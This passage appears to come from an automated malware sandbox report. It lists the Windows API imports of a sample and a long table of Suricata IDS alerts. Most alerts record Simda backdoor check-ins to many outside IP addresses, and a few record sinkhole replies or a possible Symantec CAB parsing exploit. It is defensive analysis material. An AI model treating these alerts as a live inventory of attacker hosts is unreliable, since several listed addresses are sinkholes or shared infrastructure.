                                                                                                                                                                                                                  gdi32.dllCreateFontIndirectExA, CreatePolygonRgn, CreateDIBitmap, GetLogColorSpaceW, SetGraphicsMode, GdiGetBatchLimit, ScaleWindowExtEx, SelectObject, GetEnhMetaFileHeader, GetFontData, SetLayout, SetRectRgn, ExtSelectClipRgn, EnumFontFamiliesA, GetAspectRatioFilterEx, GetNearestPaletteIndex, PolylineTo, PatBlt, SelectClipRgn
                                                                                                                                                                                                                  ADVAPI32.DLLRegEnumValueW, RegReplaceKeyA, RegCreateKeyW, RegQueryValueA, RegCreateKeyExA, RegReplaceKeyW, RegCloseKey
                                                                                                                                                                                                                  SHLWAPI.DLLPathGetArgsW, ChrCmpIA, StrSpnW, PathAddBackslashW, PathIsUNCA, SHRegOpenUSKeyW, PathIsPrefixA, PathCompactPathExA
                                                                                                                                                                                                                  COMCTL32.DLLFlatSB_SetScrollRange, InitCommonControls
                                                                                                                                                                                                                  winspool.drvAddFormW, EnumMonitorsW, OpenPrinterW, GetJobW, DeleteMonitorA, EndDocPrinter, AddPrinterConnectionW, SetPrinterDataExW
                                                                                                                                                                                                                  INETCOMM.DLLMimeOleParseRfc822Address, MimeOleParseRfc822AddressW, HrGetAttachIcon, EssSecurityLabelEncodeEx, MimeOleGetDefaultCharset, MimeOleGetFileExtension, HrAttachDataFromFile, EssKeyExchPreferenceEncodeEx, EssSignCertificateDecodeEx, MimeOleSMimeCapGetHashAlg, EssKeyExchPreferenceDecodeEx, MimeOleGetCharsetInfo, MimeOleGetCertsFromThumbprints

                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                  2024-11-11T18:50:20.242899+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652127178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:50:28.382178+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64971418.208.156.24880TCP
                                                                                                                                                                                                                  2024-11-11T18:50:28.384108+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.663778UDP
                                                                                                                                                                                                                  2024-11-11T18:50:28.388425+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.649714TCP
                                                                                                                                                                                                                  2024-11-11T18:50:28.388425+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.649714TCP
                                                                                                                                                                                                                  2024-11-11T18:50:28.394575+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6497153.94.10.3480TCP
                                                                                                                                                                                                                  2024-11-11T18:50:28.400852+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.649715TCP
                                                                                                                                                                                                                  2024-11-11T18:50:28.400852+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.649715TCP
                                                                                                                                                                                                                  2024-11-11T18:50:28.853586+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64971723.253.46.6480TCP
                                                                                                                                                                                                                  2024-11-11T18:50:28.967187+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64972175.2.71.19980TCP
                                                                                                                                                                                                                  2024-11-11T18:50:28.995545+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64971944.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:50:29.049618+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64972044.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:50:29.056090+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.649720TCP
                                                                                                                                                                                                                  2024-11-11T18:50:29.056090+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.649720TCP
                                                                                                                                                                                                                  2024-11-11T18:50:29.129713+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649722208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:50:29.132050+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649718188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:29.132181+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649723199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:50:29.316635+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64972585.17.31.12280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:29.332735+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64972675.2.71.19980TCP
                                                                                                                                                                                                                  2024-11-11T18:50:29.336475+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64972423.253.46.6480TCP
                                                                                                                                                                                                                  2024-11-11T18:50:29.938801+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649722208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:50:30.305367+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649716199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:30.453744+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64972985.17.31.12280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:30.765094+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649728154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:31.135319+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649728154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:31.277356+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649730188.114.96.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:31.640900+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649718188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:32.163788+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649716199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:32.974570+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649732188.114.96.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:33.801283+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64973913.248.169.4880TCP
                                                                                                                                                                                                                  2024-11-11T18:50:34.292654+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64974518.208.156.24880TCP
                                                                                                                                                                                                                  2024-11-11T18:50:34.316861+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6497463.94.10.3480TCP
                                                                                                                                                                                                                  2024-11-11T18:50:34.461380+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649740188.114.97.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:35.422578+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649753103.150.10.4880TCP
                                                                                                                                                                                                                  2024-11-11T18:50:36.286835+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649748188.114.97.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:36.525173+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649753103.150.10.4880TCP
                                                                                                                                                                                                                  2024-11-11T18:50:36.618406+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649740188.114.97.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:38.639221+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649770188.114.97.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:39.231729+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64978776.223.67.18980TCP
                                                                                                                                                                                                                  2024-11-11T18:50:39.333074+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64978664.225.91.7380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:39.459120+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64979344.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:50:39.661493+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649794103.224.212.21080TCP
                                                                                                                                                                                                                  2024-11-11T18:50:39.707541+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649795103.224.182.25280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:40.071995+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649796154.85.183.5080TCP
                                                                                                                                                                                                                  2024-11-11T18:50:40.396288+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649796154.85.183.5080TCP
                                                                                                                                                                                                                  2024-11-11T18:50:41.413497+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.649809TCP
                                                                                                                                                                                                                  2024-11-11T18:50:42.059796+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64982164.225.91.7380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:42.207628+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64982272.52.179.17480TCP
                                                                                                                                                                                                                  2024-11-11T18:50:42.710031+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.64982972.52.179.17480TCP
                                                                                                                                                                                                                  2024-11-11T18:50:45.503052+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65336152.34.198.22980TCP
                                                                                                                                                                                                                  2024-11-11T18:50:45.509709+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.653361TCP
                                                                                                                                                                                                                  2024-11-11T18:50:45.509709+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.653361TCP
                                                                                                                                                                                                                  2024-11-11T18:50:47.379554+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65337744.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.461931+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649722208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.644765+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649718188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.665125+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649728154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.686836+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649722208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.810984+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.653397199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.819147+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464385.17.31.12280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.827041+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464223.253.46.6480TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.845213+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464475.2.71.19980TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.127177+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649728154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.343575+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464823.253.46.6480TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.581438+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464775.2.71.199443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.656007+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649716199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.693241+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464685.17.31.12280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.946205+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654645188.114.96.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:50.392760+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649718188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:51.677988+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654664188.114.96.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:52.549462+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649753103.150.10.4880TCP
                                                                                                                                                                                                                  2024-11-11T18:50:52.661556+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649740188.114.97.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:53.193925+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649753103.150.10.4880TCP
                                                                                                                                                                                                                  2024-11-11T18:50:54.724755+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654680188.114.97.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:55.237760+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649740188.114.97.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:58.118452+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654701188.114.97.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:58.559668+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649796154.85.183.5080TCP
                                                                                                                                                                                                                  2024-11-11T18:50:58.867087+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654724103.224.212.21080TCP
                                                                                                                                                                                                                  2024-11-11T18:50:58.868021+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654725103.224.182.25280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:58.874229+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649796154.85.183.5080TCP
                                                                                                                                                                                                                  2024-11-11T18:51:01.715916+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65376472.52.179.17480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.022620+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.658475UDP
                                                                                                                                                                                                                  2024-11-11T18:51:02.257245+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65376672.52.179.17480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.644676+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65377399.83.170.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.653221+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65377444.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.687438+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.653772162.255.119.10280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.851434+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.653777199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.871820+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.653776208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.077021+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6521193.94.10.3480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.122626+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652122199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.122914+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65212144.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.129382+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652123208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.131696+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652125178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.215055+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652124162.255.119.10280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.250811+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65212918.208.156.24880TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.387344+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652126188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.476165+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652133199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.512905+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652128188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:05.390728+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65214544.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:05.395317+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65214644.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:05.472086+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6521473.94.10.3480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:05.478958+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65215044.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:05.495054+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652149208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:08.013364+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652149208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:08.359590+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652163178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:51:08.770082+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65217299.83.170.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.031576+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65217091.195.240.1980TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.288928+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.653776208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.495150+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65021844.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.580373+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650219178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.643025+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65021099.83.170.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.747199+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65021691.195.240.1980TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.868031+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652171188.114.96.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.951696+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650215154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:10.410076+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652164199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:10.742762+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652123208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:11.007062+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652128188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:11.028634+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65022618.208.156.24880TCP
                                                                                                                                                                                                                  2024-11-11T18:51:11.169370+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650217199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:11.524536+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650227154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:12.223562+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650234208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:12.471105+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650228199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:13.389967+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6502353.94.10.3480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:13.582954+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650236199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:13.851378+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65023944.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:13.909835+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65024244.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:13.940191+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650244178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:51:14.030524+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650243162.255.119.10280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:14.291524+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650238154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:14.965158+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65024691.195.240.1980TCP
                                                                                                                                                                                                                  2024-11-11T18:51:15.357751+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650241199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:17.440468+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659192154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:19.730439+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659197199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:51:19.731431+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65919844.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:19.732974+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65919544.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:19.733944+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6591993.94.10.3480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:20.479116+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.659201TCP
                                                                                                                                                                                                                  2024-11-11T18:51:21.480505+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659196199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:22.284590+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659204178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:51:22.296321+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65920699.83.170.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:22.304407+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65920818.208.156.24880TCP
                                                                                                                                                                                                                  2024-11-11T18:51:22.316762+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659205208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:22.371379+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659200188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:22.403885+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659203162.255.119.10280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:22.755937+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659207154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:25.660834+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659214178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:51:25.685561+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6592133.94.10.3480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:25.685857+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65921544.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:25.685967+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65921818.208.156.24880TCP
                                                                                                                                                                                                                  2024-11-11T18:51:25.689589+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65922299.83.170.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:25.689589+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65921944.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:25.691993+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659216199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:51:25.788734+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659220162.255.119.10280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:26.029010+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659223188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:26.143279+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659221154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:26.702774+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659212199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:27.046754+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65922644.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:27.128722+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659225162.255.119.10280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:32.854009+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65923318.208.156.24880TCP
                                                                                                                                                                                                                  2024-11-11T18:51:34.292569+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659238178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:51:34.292614+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65923599.83.170.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:34.292655+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65923744.221.84.10580TCP
